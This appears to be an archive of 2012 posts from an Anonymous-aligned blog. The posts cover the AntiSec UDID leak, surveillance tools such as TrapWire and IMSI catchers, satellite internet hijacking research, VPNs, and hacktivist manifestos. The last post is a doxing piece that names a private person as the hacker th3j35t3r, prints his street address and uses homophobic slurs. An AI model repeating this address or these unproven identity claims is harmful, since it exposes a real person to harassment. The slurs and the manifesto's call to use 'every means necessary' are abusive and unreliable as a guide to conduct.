It took only hours for about a dozen sessions to spring up around the world on a dedicated wiki page following what was only a casual Twitter exchange between Wolf and others — now cryptoparty organisers.

“When I woke up in the morning, they were all there,” Wolf said.

There was no formal uniformity between each crytoparty. Some were hands-on, with users practising on laptops and tablets, while others were more theory-based with some organisers.

Each session runs for around five hours.

The free classes could accommodate a maximum of about 30 to 40 attendees. One of the first parties in the Southeastern US state of Tennessee had more than 100 people turn up to its afterparty, an event complete with music, beer and fire-twirling.

Anonymous Hackers Claim To Release One Million Apple Devices’ Unique Identifiers Stolen From FBI

Sep 4, 2012 | Anonymous, Leaks, News

Anonymous has a way of releasing massive collections of information that raise many more questions than they answer.

Case in point: On Monday night, the segment of the hacker group that calls itself Antisec announced that it had dumped 1,000,001 unique device identifier numbers or UDIDs for Apple devices–the fingerprints that Apple, apps and ad networks use to identify the iPhone and iPads of individual users–that it claims to have stolen from the FBI. In a long statement posted with links to the data on the upload site Pastebin, the hackers said they had taken the Apple data from a much larger database of more than 12 million users’ personal information stored on an FBI computer.

While there’s no easy way to confirm the authenticity or the source of the released data, I downloaded the encrypted file and decrypted it, and it does seem to be an enormous list of 40-character strings made up of numbers and the letters A through F, just like Apple UDIDs. Each string is accompanied by a longer collection of characters that Anonymous says is an Apple Push Notification token and what appears to be a username and an indication as to whether the UDID is attached to an iPad, iPhone or iPod touch.

In their message, posted initially in the Anonymous twitter feed AnonymousIRC, the hackers say they used a vulnerability in Java to access the data on an FBI Dell laptop in March of this year. They say the database included not only the UDIDs, but also “user names, name of device, type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc.” Anonymous claims that the amount of data about each users was highly variable, and that it only released enough data to the public “to help a significant amount of users to look if their device are listed there or not.”

The Antisec statement also took the opportunity to mock the recent appearance of NSA Director and General Keith Alexander at the hacker conference Defcon, where he made a recruiting pitch to attendees. “It was an amusing hypocritical attempt made by the system to flatter hackers into becoming tools for the state,” Anonymous’ statement reads. “We decided we’d help out Internet security by auditing FBI first.”

If the UDIDs are determined to be real, just what that means about law enforcement and Apple users’ privacy isn’t entirely clear. Much more than passwords or even email addresses, UDIDs are already spread around the Internet by app developers and advertisers–a study by one privacy researcher in 2011 found that 74% of the apps he tested sent a user’s UDID to a remote server. But the same researcher also found that five out of seven social gaming networks he tested allowed users to log in with only their UDID, making a stolen UDID equivalent to a stolen password.

“We never liked the concept of UDIDs since the beginning indeed,” reads the Anonymous statement. “Really bad decision from Apple. Fishy thingie.”

Due perhaps to the privacy concerns around UDIDs’ proliferation, Apple stopped allowing new iOS apps to track UDIDs earlier this year.

Regardless, if the FBI has in fact collected 12 million Apple UDIDs–or even just one million–it will have some explaining to do to privacy advocates. In its release, Anonymous argues that the massive dump of users’ personal information, which it says has been stripped of many of the most identifying details, is designed raise awareness of the FBI’s alleged gadget-tracking shenanigans. “…We will probably see their damage control teams going hard lobbying media with bullshits to discredit this,” the statement reads at one point. “But well, whatever, at least we tried and eventually, looking at the massive number of devices concerned, someone should care about it.”

For now, Anonymous refuses to answer more questions about its release–at least from the press. Before granting any interviews, it’s demanding that Gawker writer Adrian Chen, who has been especially critical of Anonymous, appears on Gawker’s home page in a “huge picture of him dressing a ballet tutu and shoe on the head.”

SOURCE: Forbes.com

Protect Yourself from FBI Manipulation (w/attorney Harvey Silverglate)

Aug 20, 2012 | Anonymous

Learn how the FBI can manipulate what you say and use it against you, and how to prevent them from doing so! With civil liberties and civil rights attorney Harvey Silverglate.

Remember: if the FBI asks to speak with you, you do not have to talk to them, no matter what they say. The best thing you can do is take the agent’s card and say your lawyer will contact them. Say nothing else, because lying to a federal agent can get you in very serious trouble, and they’ll figure out a way to make it look like you lied. Watch the clip to see how that works. Don’t get caught in their vice; don’t speak to them without your lawyer present. Ever.

#OpBigBrother – EMERGENCY ALERT ABOUT WORLDWIDE SURVEILLANCE FROM ANONYMOUS

Aug 16, 2012 | Anonymous

For years Anonymous worked hard to protect our world and its peoples.

NOW LISTEN CAREFULLY,
This is an ALERT ABOUT SURVEILLANCE.

Privacy of the people all over the world is suffering more and more outrages. We should not tolerate it. Cameras are everywhere even in our sky, and robots are used to gather and treat information collected through Internet spying.

If Governments and corporations reach their goal to use network surveillance technologies to take control of our world, they will clear Freedom from both the real life and the Internet. That means Anonymous won’t be able to continue helping humanity.
They plan to destroy each form of protest including Anonymous. That means that Anonymous members will be tracked and neutralized if we do not unite against surveillance.

The population is not ready to understand and help us, we need to join the biggest fight ever seen on Anonymous era and use every means necessary to expose truth.

Let the HIVE begins the strongest online and offline worldwide protest ever seen in the history of humanity. They showed they had no limits, we will show our power goes well beyond.

Worldwide governments, evil corporations time of summations is over.

We are Anonymous, we are not numbers, united as one, divided by zero.
Wordwide union will shutdown BigBrother.
That fight will lead us to triumph or to perish.
This is a time trial. WE ACT OR WE FALL.

We are Anonymous,
We are Legion
We do not forgive
We do not forget
Expect us !

=======================================================
Join us on irc.anonops.pro/6697 SSL chan #OpBigBrother

PAD : https://pad.riseup.net/p/MMhJshLWd6AV

AnonPR On TrapWire: Cops And Feds Are Watching You At All Times

Aug 13, 2012 | Anonymous, Video

In August 2012, Wikileaks revealed details about a system known as Trapwire that uses facial recognition and other techniques to track and monitor individuals captured on countless different closed-circuit cameras operated by cities and other insititutions. The software is billed as a method by which to prevent terrorism, but can of course also be used to provide unprecedented surveillance and data-mining capabilities to governments, corporations, and other insitutions, including many with a history of using new technologies to violate the rights of citizens. Trapwire is already used in New York, Los Angeles, Las Vegas, Texas, DC, London, and other locales.

The ex-CIA agents who help run the firm are old friends of Stratfor vice president Fred Burton, whom they’ve briefed on their own capabilities in e-mails obtained by Anonymous hackers and provided to Wikileaks. Stratfor has engaged in at least several surveillance operations against activists, such as those advocating for victims of the Bhopal disaster, on behalf of large U.S. corporatons; Burton himelf was revealed to have advocated “bankrupting” and “ruining the life” of activists like Julian Assange in e-mails to other friends.

Trapwire can be extremely expensive to maintain, and is usually done so at taxpayer expense; Los Angeles county spent over $1.4 million dollars on the software’s use in a single three-month period of 2007.

Although most of the regions in which Trapwire operates don’t share information with each other, all of this is set to change; as Abraxas Applications president Dan Botsch told Burton via e-mail, “I think over time the different networks will begin to unite,” noting that several networks had already begun discussions on merging their information. Abraxas itself has always had the ability to “cross-network matches” from every region at their own office. By June 2011, Washington D.C. police were engaged in a pilot project under the Departent of Homeland Security that’s likely to lead to more cities using Trapwire on a more integrated basis.

Abraxas, the firm whose spin-off Abraxas Applications developed Trapwire in 2007, has long been involved in a lesser-known practice known as persona management, which involves the use of fake online “people” to gather intelligence and/or disseminate disinformation. The firm Ntrepid, created by Abraxas owner Cubic Corporation, won a 2010 CENTCOM contract to provide such capabilities for use in foreign countries; several board members of Ntrepid also sit on Abraxas.

TrapWire®

TrapWire is a unique, predictive software system designed to detect patterns indicative of terrorist attacks or criminal operations. Utilizing a proprietary, rules-based engine, TrapWire detects, analyzes and alerts on suspicious events as they are collected over periods of time and across multiple locations. Through the systematic capture of these pre-attack indicators, terrorist or criminal surveillance and pre-attack planning operations can be identified — and appropriate law enforcement counter measures employed ahead of the attack. As such, our clients are provided with the ability to prevent the terrorist or criminal event, rather than simply mitigate damage or loss of life.

How To Hack Satellite Internet & Surf Anonymously

Jul 15, 2012 | Anonymous

A Spanish researcher demos new satellite-hijacking tricks with cybercriminal potential.

Satellites can bring a digital signal to places where the Internet seems like a miracle: off-the-grid desert solar farms, the Arctic or an aircraft carrier at sea. But in beaming data to and from the world’s most remote places, satellite Internet may also offer its signal to a less benign recipient: any digital miscreant within thousands of miles.

In a presentation at the Black Hat security conference in Arlington, Va., Tuesday, Spanish cybersecurity researcher Leonardo Nve presented a variety of tricks for gaining access to and exploiting satellite Internet connections. Using less than $75 in tools, Nve, a researcher with security firm S21Sec, says that he can intercept Digital Video Broadcast (DVB) signals to get free high-speed Internet. And while that’s not a particularly new trick–hackers have long been able to intercept satellite TV or other sky-borne signals–Nve also went a step further, describing how he was able to use satellite signals to anonymize his Internet connection, gain access to private networks and even intercept satellite Internet users’ requests for Web pages and replace them with spoofed sites.

“What’s interesting about this is that it’s very, very easy,” says Nve. “Anyone can do it: phishers or Chinese hackers … it’s like a very big Wi-Fi network that’s easy to access.”

In a penetration test on a client’s network, Nve used a Skystar 2 PCI satellite receiver card, a piece of hardware that can be bought on eBay ( EBAY – news – people ) for $30 or less, along with open source Linux DVB software applications and the network data analysis or “sniffing” tool Wireshark.

Exploiting that signal, Nve says he was able to impersonate any user connecting to the Internet via satellite, effectively creating a high-speed, untraceable anonymous Internet connection that that can be used for nefarious online activities.

Nve also reversed the trick, impersonating Web sites that a satellite user is attempting to visit by intercepting a Domain Name System (DNS) request–a request for an Internet service provider (ISP) to convert a spelled out Web site name into the numerical IP address where it’s stored–and sending back an answer faster than the ISP. That allows him to replace a Web site that a user navigates to directly with a site of his choosing, creating the potential for undetectable cybercrime sites that steal passwords or installs malicious software.

In his tests on the client’s network, Nve says he was also able to hijack signals using GRE or TCP protocols that enterprises use to communicate between PCs and servers or between offices, using the connections to gain access to a corporation or government agency’s local area network.

The Barcelona-based researcher tested his methods on geosynchronous satellites aimed at Europe, Africa and South America. But he says there’s little doubt that the same tricks would work on satellites facing North America or anywhere else.

What makes his attacks possible, Nve says, is that DVB signals are usually left unencrypted. That lack of simple security, he says, stems from the logistical and legal complications of scrambling the signal, which might make it harder to share data among companies or agencies and–given that a satellite signal covers many countries–could run into red tape surrounding international use of cryptography. “Each [country] can have its own law for crypto,” says Nve. “It’s easier not to have encryption at the DVB layer.”

Nve isn’t the first to show the vulnerability of supposedly secure satellite connections. John Walker, a British satellite enthusiast, told the BBC in 2002 that he could watch unencrypted NATO video feeds from surveillance sorties in the Balkans. And the same lack of encryption allowed insurgents to hack into the video feed of unmanned U.S. drone planes scouting Afghanistan, the Wall Street Journal reported in December.

In fact, the techniques that Nve demonstrated are probably known to other satellite hackers but never publicized, says Jim Geovedi, a satellite security researcher and consultant with the firm Bellua in Indonesia. He compares satellite hacking to early phone hacking or “phreaking,” a practice that’s not well protected against but performed by only a small number of people worldwide. “This satellite hacking thing is still considered blackbox knowledge,” he wrote in an e-mail to Forbes. “I believe there are many people out there who conduct similar research. They may have some cool tricks but have kept them secret for ages.”

At last year’s Black Hat D.C. conference, British cybersecurity researcher Adam Laurie demonstrated how he intercepts satellite signals with techniques similar to Nve, using a DreamBox satellite receiver and Wireshark. But Nve argues that his method is far cheaper–Laurie’s DreamBox setup cost around $750–and that he’s the first to demonstrate satellite signal hijacking rather than mere interception.

“I’m not just talking about watching TV,” says Nve. “I’m talking about doing some very scary things.”

At 12:57 PM, satellite_hacker said…

Satellite hacking for fun isn’t cheap! One of the sessions I was really looking forward to ahead of the Black Hat DC event this year was Adam Laurie’s session titled – Satellite Hacking for Fun and Profit.

It’s a session that didn’t disappoint, Laurie is always entertaining, but it also revealed how much effort is actually required to try and get at satellite signals.

First off, Laurie prefaced his talk by noting that he wasn’t going to talk about hacking the actual satellite in space itself.

“I’m playing it safe and just looking at what is coming down,” Laurie told the Black Hat audience.

Instead what Laurie focused his talk on was something he called ‘Feed Hunting’ – that is looking for satellite feeds that are not supposed to be found. Laurie claimed that he has been doing satellite feed hunting for years – at least as far back as the untimely demise of the late Princess Diana in 1997. Laurie claimed that he was able to find a non-public feed from a TV broadcaster that had left their transponder on in a Paris hotel room.

Fast forward a dozen years and Laurie commented that the technology to identify satellite feeds has progressed dramatically. Among the reasons why he satellite feed hunting has gotten easier is an open source based satellite received called the dreambox.

Laurie explained that the dreambox has a web interface that makes it easier to find streams and provides information on what the stream includes. Another open source technology also helps to feed hunt satellite content.

A project called dvbsnoop is a DVB (dIgital video broadcasting) and MPEG stream analyzer that lets the user access raw data from DVB card. By sifting through the raw data, Laurie demonstrated that interesting satellite feeds that weren’t intended to be public could be found.

Going a step further, Laurie claimed that he had created his own python based script called dreaMMap that could create a 3d model of satellite frequency transmissions. With the 3D model the user just does a point and click to steer dish to a particular satellite frequency. One memory of the Black Hat audience asked Laurie if what he was doing was legal. Laurie shrugged and commented:

“I’m in the US giving a talk where I’m tunneled to my server in the UK and looking at a satellite in space that is over Africa â€“ so who would get me?”

All told there is a financial cost to Laurie’s satellite feed hunting techniques – and that cost is approximately $785 for the Dreambox hardware, the actual satellite dish and then the motor and the mount for the dish. Well I guess if you’ve got the money to burn…

SOURCE: Satellite Internet Blog

VPN vs. SSH Tunnel: Which Is More Secure?

Jul 11, 2012 | Anonymous

VPNs and SSH tunnels can both securely “tunnel” network traffic over an encrypted connection. They’re similar in some ways, but different in others – if you’re trying to decide which to use, it helps to understand how each works.

An SSH tunnel is often referred to as a “poor man’s VPN” because it can provide some of the same features as a VPN without the more complicated server setup process – however, it has some limitations.

How a VPN Works

VPN stands for “virtual private network,” – as its name indicates, it’s used for connecting to private networks over public networks, such as the Internet. In a common VPN use case, a business may have a private network with file shares, networked printers, and other important things on it. Some of the business’s employees may travel and frequently need to access these resources from the road. However, the business doesn’t want to expose their important resources to the public Internet. Instead, the business can set up a VPN server and employees on the road can connect to the company’s VPN. Once an employee is connected, their computer appears to be part of the business’s private network – they can access file shares and other network resources as if they were actually on the physical network.

The VPN client communicates over the public Internet and sends the computer’s network traffic through the encrypted connection to the VPN server. The encryption provides a secure connection, which means the business’s competitors can’t snoop on the connection and see sensitive business information. Depending on the VPN, all the computer’s network traffic may be sent over the VPN – or only some of it may (generally, however, all network traffic goes through the VPN). If all web browsing traffic is sent over the VPN, people between the VPN client and server can’t snoop on the web browsing traffic. This provides protection when using public Wi-Fi networks and allows users to access geographically-restricted services – for example, the employee could bypass Internet censorship if they’re working from a country that censors the web. To the websites the employee accesses through the VPN, the web browsing traffic would appear to be coming from the VPN server.

Crucially, a VPN works more at the operating system level than the application level. In other words, when you’ve set up a VPN connection, your operating system can route all network traffic through it from all applications (although this can vary from VPN to VPN, depending on how the VPN is configured). You don’t have to configure each individual application.

To get started with your own VPN, see our guides to using OpenVPN on a Tomato router, installing OpenVPN on a DD-WRT router, or setting up a VPN on Debian Linux.

How an SSH Tunnel Works

SSH, which stands for “secure shell,” isn’t designed solely for forwarding network traffic. Generally, SSH is used to securely acquire and use a remote terminal session – but SSH has other uses. SSH also uses strong encryption, and you can set your SSH client to act as a SOCKS proxy. Once you have, you can configure applications on your computer – such as your web browser – to use the SOCKS proxy. The traffic enters the SOCKS proxy running on your local system and the SSH client forwards it through the SSH connection – this is known as SSH tunneling. This works similarly to browsing the web over a VPN – from the web server’s perspective, your traffic appears to be coming from the SSH server. The traffic between your computer and the SSH server is encrypted, so you can browse over an encrypted connection as you could with a VPN.

However, an SSH tunnel doesn’t offer all the benefits of a VPN. Unlike with a VPN, you must configure each application to use the SSH tunnel’s proxy. With a VPN, you’re assured that all traffic will be sent through the VPN – but you don’t have this assurance with an SSH tunnel. With a VPN, your operating system will behave as though you’re on the remote network – which means connecting to Windows networked file shares would be easy. It’s considerably more difficult with an SSH tunnel.

For more information about SSH tunnels, see this guide to creating an SSH tunnel on Windows with PuTTY. To create an SSH tunnel on Linux, see our list of cool things you can do with an SSH server.

Which Is More Secure?

If you’re worried about which is more secure for business use, the answer is clearly a VPN — you can force all network traffic on the system through it. However, if you just want an encrypted connection to browse the web with from public Wi-Fi networks in coffee shops and airports, a VPN and SSH server both have strong encryption that will serve you well.

There are other considerations, too. Novice users can easily connect to a VPN, but setting up a VPN server is a more complex process. SSH tunnels are more daunting to novice users, but setting up an SSH server is simpler – in fact, many people will already have an SSH server that they access remotely. If you already have access to an SSH server, it’s much easier to use it as an SSH tunnel than it is to set up a VPN server. For this reason, SSH tunnels have been dubbed a “poor man’s VPN.”

Businesses looking for more robust networking will want to invest in a VPN. On the other hand, if you’re a geek with access to an SSH server, an SSH tunnel is an easy way to encrypt and tunnel network traffic – and the encryption is just as good as a VPN’s encryption.

SOURCE: HowToGeek.com

Attention Activists: Your Phone May Not Be Safe at Protests

Jul 10, 2012 | Anonymous, Black Technology, Video

Ever wondered why your cell phone reception suddenly becomes terrible at protests? Ever worried that police could use electronic spoofing devices to suck up your mobile data because you are in the streets exercising your rights?

You might have been onto something.

Mobile “IMSI catchers”, currently on the market and being pushed to police and intelligence agencies worldwide, enable these creepy, stealth spying tactics. And if they build it and hawk it, history tells us police will buy it and deploy it.

On Tuesday, July 3, 2012, electronic privacy advocate and technology researcher Chris Soghoian tweeted a link to a photograph of a talk he gave at TED in Scotland in late June. Behind him in the photograph is another image, this one taken by privacy researcher Eric King at a surveillance trade show. (King’s Twitter bio contains a quote from a representative of the notorious ISS World — a global surveillance trade firm that often hosts such trade shows: the rep called him an “Anti-lawful interception zealot blogger.” High praise.)

Look at the slide behind Soghoian; that’s the photo in question. It shows an IMSI catcher strapped onto a model, under the model’s shirt.

IMSI stands for “International Mobile Subscriber Identity”. The technology is essentially a mobile phone tower with “a malicious operator”. It mimics the behavior of a cell tower and tricks mobile phones into sending data to it, instead of to the tower.

As such it is considered a Man In the Middle (MITM) attack. It is used as an eavesdropping device used for interception and tracking of cellular phones and usually is undetectable for the users of mobile phones.

Once it has made a connection with the phone and tricked it into thinking it is a mobile tower, the IMSI catcher forces the phone to drop its encryption, enabling easy access to the contents of the device. The tool then lets the attacker listen in on mobile conversations and intercept all data sent from a mobile phone, remaining undetected. In some cases the tool also allows the operator to manipulate messages.

Here’s a creepy video that a purveyor of IMSI catchers made to advertise its product:

^{_{Please note that by playing this clip YouTube and Google will place a long term cookie on your computer.}}

Police in the United States claim they do not need a warrant to use an IMSI catcher or other spoofing device to track your location. A case to determine whether or not the courts agree is working itself through the system.

Privacy International’s Eric King took the photo on the slide behind Soghoian at a surveillance trade show, where he says the tool was “pitched to me as being perfect for covert operations in public order situations.” In other words, at protests.

The FBI uses IMSI catchers and claims it does so legally, even though it says it doesn’t need a warrant to deploy them. The Electronic Privacy Information Center is currently pursuing FOIA litigation to find out exactly how the bureau uses the “Stingray” (a brand name IMSI catcher); unsurprisingly, the FBI wasn’t forthcoming with documents to reveal its legal standard or other information about how it uses the tool. Stay tuned for more information as that case makes its way through the courts.

Meanwhile, how can you protect yourself against IMSI catchers? Unfortunately, you probably can’t. And the threats are not just from government. As Soghoian and others warned in a friend of the court brief,

Finally, the communications privacy of millions of law-abiding Americans is already threatened by the use of this and similar interception technologies by non-US government entities, such as stalkers, criminals, and foreign governments engaged in espionage. As such, the public interest is best served by greater public discussion regarding these tracking technologies and the security flaws in the mobile phone networks that they exploit, not less.

Yet again, we are faced with a situation in which our technology has outpaced our law reform. It’s time for Congress to change that.

To get a more detailed sense of how the technology actually works, watch this excellent talk from DefCon 2011, with Chris Paget: “Practical Cellphone Spying”. He spoofs the phones of the people in the audience during the talk; it’s well worth watching if you have some time.

For more on IMSI catchers and the state of the law, click here.

SOURCE: PrivacySOS

Make it Happen 2012 – Anonymous Transmission

Jun 26, 2012 | Anonymous, Video

Protesting, Police Violence, Transparency, Global Government, all being manipulated against Humanity’s interests. 2012 is the year we take back our FREEDOMS.

We do not forgive

We do not forget

We are legion

Expect us

RELEASED: Alan Turing Notes on Cryptography

Jun 24, 2012 | Anonymous

Are there any insights left to be wrung from the code breaker’s papers?

Chris Vallance of the BBC reports that GCHQ has released some of Alan Turing’s papers on the theory of code breaking. They’re not on display at the National Archives at Kew. I’ve checked the web pages of the Archives and GCHQ, and there is as of my writing nothing up there, yet.

The two papers are titled, The Applications of Probability to Crypt” and Paper on the Statistics of Repetitions. They discuss the use of mathematics to cryptanalysis. This might seem a bit obvious now, but at the time cryptanalysis was largely done by smart people and not by machines. A code-breaker was more likely someone who was good at solving complex crossword puzzles than working with numbers. It was unusual to bring in someone like Turing to a cryptology lab.

It wasn’t until machine cryptography was developed after WWI that codes were developed that were so complex humans couldn’t break them. The Enigma machine is the most famous, but there were others used all around the world.

However, using statistics has been a staple of code-breakers for centuries. It was used by British code-breaker George Scovell, to break Napoleon’s codes back in the early 1800s.

The BBC quotes a GCHQ mathematician that the papers discuss “mathematical analysis to try and determine which are the more likely settings so that they can be tried as quickly as possible.” Indeed, we know that the Engima codes were broken daily through flaws in distributing daily settings for the code machines themselves as much as breaking the actual cryptography.

It will be interesting to see what is in those papers. GCHQ says they have squeezed all the juice out of them, and therefore they are not likely to hold surprises for us in the private sector. Nonetheless, many of us will be interested in reading Turing’s words on the subjects.

Jon Callas is a renowned information security expert and CTO of Entrust.

Source: http://blogs.computerworlduk.com/security-spotlight/2012/04/alan-turing-notes-on-cryptography-released/index.htm

Anonymous – Illuminati Theme Song

Jun 23, 2012 | Anonymous, Video

http://www.youtube.com/watch?v=doqpNGSNgdI

Illuminati, you’ve come to take control.. You can take my heart beat, but you can’t break my soul.

We are shall be FREE.

Why Hillary Clinton Should Join Anonymous

Jun 12, 2012 | Anonymous

The State Department and the online mob are both destroying “Internet freedom.”

It’s hard to deny the intellectual ambiguity of “Internet freedom” when among its staunchest defenders are idealistic hacktivists from Anonymous and hard-nosed diplomats from the U.S. State Department—two groups that otherwise disagree on everything else. Ironically, both may end up hurting the very noble cause that they seek to promote.

The diplomats’ problems are quite well-known by now. While Hillary Clinton likes to give speeches in which she fashions herself the world’s greatest defender of “Internet freedom,” the harsh reality is that her own government is its greatest enemy. Given the never-ending flow of draconian copyright and cybersecurity laws coming from Washington, this fact is getting harder and harder to conceal from the global public, who starts to wonder why American diplomats keep criticizing Russia or China but don’t say anything about the impressive online spying operation that the National Security Agency is building inUtah. Nor does the State Department object when America’s allies push for harsh surveillance laws; Britain, with its proposed surveillance legislation, is a case in point. America’s “Internet freedom agenda” is at best toothless and at worst counterproductive. While focusing on (and overselling) the liberating promise of social media in authoritarian regimes, it conceals a number of emerging domestic threats that have nothing to do with dictators—and everything to do with aggressive surveillance, disappearing privacy, and the astonishing greed of Silicon Valley.

The case of Anonymous is not as straightforward. This movement is so distributed, fluid, and occasionally disorganized that anyone seeking to pigeonhole it into a coherent ideological doctrine would not get too far. Still, most of its recent high-profile attacks—upon the intelligence firm Stratfor, the Central Intelligence Agency, the signatories of the Anti-Counterfeiting Trade Agreement (which, among other things, aims to thwart Internet piracy), and the Chinese government—are motivated by a desire to defend “Internet freedom.” In this lofty goal, the agendas, if not the approaches, of Anonymous and the State Department overlap.

Why these particular targets? Predictably, Anonymous hates Western governments for ushering in more surveillance and draconian piracy laws; the security industry—for satisfying the growing policing demands of those governments; the Chinese government—for being the world’s mightiest Internet censor.

Such flashy attacks are still widely discussed in the media, and that can inspire valuable broader discussion of some important Internet issues, such as the controversial Cyber Intelligence Sharing and Protection Act. But spectacles, which are bound to get boring, are not a sustainable political strategy, as the media will eventually lose interest. And Anonymous has yet to go beyond spectacle and offer a more meaningful way for its members to contribute. Cyberattacks are cheap, easy, and can attract thousands of participants without demanding much of them. In this, they can be seen as a form of “slacktivism”—they make everyone feel good but don’t necessarily advance the cause. They can be great for stunts, but one can’t change the world with stunts alone.

But—yet another parallel to the State Department—it’s not just that Anonymous’ campaigns might be toothless. They may prove counterproductive as well. The cybersecurity industry has almost certainly benefited from the buzz and fear-mongering generated by Anonymous’ attacks. Every new incursion by Anonymous must be greeted as good news in the offices of companies providing cyberdefense to both public and private sectors. Now that Anonymous has revealed that even private intelligence-gathering firms are not safe—a few months ago, it obtained the emails from Stratfor, which eventually were published by WikiLeaks—it’s a great time to be a provider of cybersecurity services!

The hacktivists keep supplying the industry with strong examples as to why more public money should be spent beefing up Internet security and surveillance while eliminating online anonymity. Take Anonymous’ recent assaults on the websites of USTelecom and Tech America, two leading technology trade associations that have lent their support to CISPA. It doesn’t take a genius to realize that a cyberattack against groups that promote legislation to combat cyberattacks only strengthens their case. It’s like shooting a bazooka in a legislative session about gun control. This was not lost on those trade associations, and they exploited this gift from Anonymous to its fullest. Thus, the president of USTelecom claimed that “by their actions Anonymous hacktivists underscore the importance of speedy action on the bipartisan [CISPA] legislation to ensure that the Internet remains an open and safe forum for all.” Regardless of what happens to this particular piece of legislation, it’s likely that lawmakers will be under growing pressure from the military-digital complex to do something about Anonymous’ attacks—and that “something” would not be conducive to any kind of “Internet freedom.”

We can expect similar developments to take place in China, where in early April a group that calls itself “Anonymous China” defaced several government websites and promised to take down its notorious censorship system. The damage caused is minimal, while the symbolic value derived from exposing the Chinese Internet censorship to the international audiences is arguably insignificant. It’s already a well-known problem. But Anonymous’ attacks do give the Chinese government good reasons to invest money into online surveillance and, perhaps, even do it with popular support: Anonymous is not above exposing credit card details of innocent victims—and China’s burgeoning middle classes will easily grasp the implications of online insecurity. If the strikes continue, Anonymous may be China’s equivalent of Stuxnet—the computer worm that disrupted Iranian nuclear facilities—only without imposing any of Stuxnet’s crippling costs. Iran’s ongoing flirtation with the idea of a “national Internet,” itself a reaction in part to Stuxnet, is a good example of how the rhetoric of cyberattacks may be invoked to justify more Internet control.

Why doesn’t Anonymous seek more effective means of cyberactivism? This is where the organization’s decentralized structure is a liability, not an asset. The movement that claims to have no leaders—well, aside from those “leaders” who happen to be working for the FBI—and that means short-term, easy objectives (often bordering on pranks) can take precedence over long-term strategic goals.

The very idea of an online campaign to defend “Internet freedom” is problematic. It’s not like an appeal to raise money for a presidential candidate or victims of a natural disaster; it takes more than a few clicks or cash donations. Moreover, the goals and priorities of such a campaign are likely to shift all the time, depending on the political context. Defending “Internet freedom” requires constant interpretation, deliberation, and discrimination between different courses of action. In contrast, online fundraising usually has fixed goals and is amenable to small-scale, granular contributions.

Without greater bureaucratization, formal mechanisms for decision-making, and, more importantly, the capacity to accept responsibility when those decisions bring unfortunate consequences, Anonymous may end up posing as great of a threat to Internet freedom as its main nemesis, the U.S. government.

Source: http://www.slate.com/articles/technology/future_tense/2012/04/internet_freedom_threat_posed_by_hillary_clinton_s_state_department_and_anonymous_.single.html

#InfoSec: If it walks like th3j35t3r and talks like th3j35t3r, its probably TomRyanBlog

Jun 7, 2012 | Anonymous

UPDATE: Our hero Jake Davis provided some interesting commentary on this subject recently:

I remember seeing IRC logs of you and LulzSec dissing The Jester and saying his tool “XerXeS” is just SlowLoris with Tor… but how did you guys come to this conclusion? How can this be mitigated if his attacks appear to come from so many exit nodes? Just block all Tor exit nodes? I dnt wanna to. :(

“I have no idea how XerXeS or any other DDoS tool actually works, all I know is that the person or people running the character known as The Jester have been doing it successfully for many years with absolutely zero discrepancies, arrests or suspensions. I think that’s it’s incredibly impressive that The Jester has stuck to the courage of his/her/their convictions for such a large period of time, even though I disagree with some of the political views expressed. I’m a big fan of facilitating alternative realities and The Jester brings us into another world with many sophisticated layers that often make us forget that it’s just a twitter account and a blog, which is a talent few people have. I find the construction of the persona at a granular level far more admirable than the hacking itself, which I obviously don’t approve of. ” -via http://ask.fm/DoubleJake

>DecryptedMatrix gives voice to PiraX

Hello there, th3j35t3r. We would also like to welcome our fellow Anons, bloggers, and those simply interested in a cyber-culture controversy spanning over two years. We are sure you know why we have called you here. Your recent online behavior has been rather strange, to say the least. We are here for one reason: We want to end you.

We would like to start first by making you comfortable. No more quasi-anonymous pseudonym mumbo-jumbo. Your name is Thomas so we will call you by the name you were given by your mother. We know your name because it was confirmed over a month ago with the following Pastebin paste: http://pastebin.com/A5iiTAJS (PiraX Dox continued after paste)
________________________________________________________________________

Q: Are Thomas Ryan and th3j35t3r one and the same person?

tl;dr: Yes. You fucking bet they are. In the words of Oscar Wilde, however, ‘The truth is rarely pure and never simple.’ Thus, if you want the full, uncensored dox on th3j35t3r, you’re going to have to bear with me for the next ten minutes as I tear apart his tissue of lies and disinformation.

Now concentrate, cos here comes the proof…

Warning: Long dox is looooooooong. I trust it will prove to be an enlightening read however, not least for Mr Thomas Ryan of 86 Amber Street, Staten Island NY.

SEE TOM RYAN AS JESTER at DEFCON 19

Filmed at Defcon after observing Tom Ryan post and photograph a note outside the vendor room signed “J.” This photo was tweeted from @th3j35t3r twitter within moments, as was the following: https://i.imgur.com/axth3.jpg
Note the “Black cell paintball” logo on the shirt. BCP is the name of Tom’s Paintball team. Tom hangs on PBnation.com with a kid called j35t3r, which is the likely source for the name, and the first of many plagiarisms. NOT SUSPICIOUS AT ALL, folks. Nor is it suspicious that the ridiculous attempts to smear me as a secret blackhat/anon/whatever over the last year all come from the same group of six people connected to Tom. The other partner is tentatively identified, but that’s a story for later.

**********

Among the 9,000 names to have been linked with @th3j35t3r, one that keeps cropping up is that of @TomRyanBlog. The dox has been denied by th3j35t3r, but then Sabu repeatedly denied that he was Hector Monsegur, and we all know how that one ended up…

While many Anons have been focused on reverse DNS lookups, port scanning and conventional doxing methods to unmask Jester, no one seems to have tried a simpler technique: writing analysis.

If Tom Ryan (TR) and Jester (J) are one and the same person, it should be easy to tell. They’ve written 3,000 tweets between them. Even the l33t3st of the l33t would struggle to convincingly maintain two separate writing styles over the course of thousands of tweets and numerous blog posts.

For those who are new to the party, here’s an overview of what we know about TR and J:

Both are conservative, right-wing and love their precious military. Both hate #OWS, Wikileaks, Manning and are obsessed with unmasking Anons. Both are fixated with Sabu (still!), Team Pois0n and Cabin Cr3w. Both enjoy love-ins with @AsherahResearch, @AnonymousDown and all the usual trolls. In short, they’re both neo-con faggots. But are they one and the same faggot, or are they separate fags who happen to be pursuing identical vendettas?

Before we get bogged down in analyzing their writing styles, here’s some lighter tit-bits to get things kick-started:

1. Last year, TR and J both attended Hacker Halted in Miami and DEFCON in Nevada. Based on what we know of the pair’s political leanings and infosec knowledge, that alone automatically narrows them down to less than 5,000 possible suspects.

2. TR and J both like sushi (a trifling detail, but one that helps build a picture of their personalities). TR: “@p0isAn0N not going to the right Pizzaria. If you are in Boston you should be going to BoLoCo for Burritos anyway. And Duozo for Sushi.”
J: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

3. Tom Ryan has form for assuming false identities – such as ‘Robin Sage’. See here for the full story:
